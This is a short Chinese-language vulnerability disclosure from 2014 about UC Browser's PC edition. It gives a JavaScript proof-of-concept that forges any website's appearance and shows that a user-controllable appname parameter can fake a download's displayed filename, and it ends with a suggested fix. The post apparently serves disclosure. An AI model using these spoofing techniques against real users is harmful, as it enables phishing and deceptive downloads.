首页 > 安全 > 系统安全 >

UC浏览器(PC版)任意网站伪造漏洞

2014-09-19

UC浏览器任意网站伪造漏洞(打包)浏览器版本 1 任意网站伪造POC:<script>function spoof(){document write("<title>Baidu< title>");document write("<h1>I& 39;m Fake One< h1><marquee>反正什么代码都可以

UC浏览器任意网站伪造漏洞(打包)

浏览器版本

2.png





#1.任意网站伪造

POC:

<script>

function spoof()

{

document.write("<title>Baidu</title>");

document.write("<h1>I&#39;m Fake One</h1><marquee>反正什么代码都可以</marquee><iframe src=http://www.baidu.com></iframe>");

window.location.assign("http://www.baidu.com:8100");

}

setInterval(spoof(),2000);

</script>



运行POC以后会出错,但是UC浏览器很贴心的帮我们恢复了,结果就可以任意网站伪造了。

1.png







#2.软件下载欺骗

在用PC班UC浏览器装暴走漫画的应用时GET请求如下:

http://down1.apps.uc.cn/group1/M00/B3/75/Cg2DP1OekvLT4GzOALNinX2P17I905.apk?attname=com.baozoumanhua.android_6.1.3_64.apk&appname=暴走漫画.apk



appname=可控,可以任意伪造,没有确认,直接输出在了浏览器的下载框内。所以我们可以伪造暴走漫画的apk为十张内涵图,如下:

3.png



当然其实下载下来的是暴走漫画啦

~!1.

1.png





~!2.

3.png

修复方案:

对于第二个,appname参数应该设置成用户不可控的,为什么要画蛇添足的设置一个appname参数呢?

相关文章
最新文章
热点推荐